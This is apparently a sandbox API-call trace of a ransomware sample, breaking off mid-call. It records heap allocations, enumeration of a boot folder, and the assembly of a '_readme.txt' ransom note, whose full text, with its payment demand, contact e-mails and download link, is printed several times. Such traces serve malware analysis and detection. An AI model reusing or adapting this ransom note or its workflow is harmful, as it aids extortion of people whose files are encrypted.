RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.813] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0200.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.813] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.813] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.813] PathFindFileNameW (pszPath="") returned="" [0200.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.813] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.814] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0200.814] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b67060 [0200.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.814] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.814] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0200.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.814] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0200.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.815] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.815] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.815] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.815] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.816] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.816] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.816] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.816] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.816] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 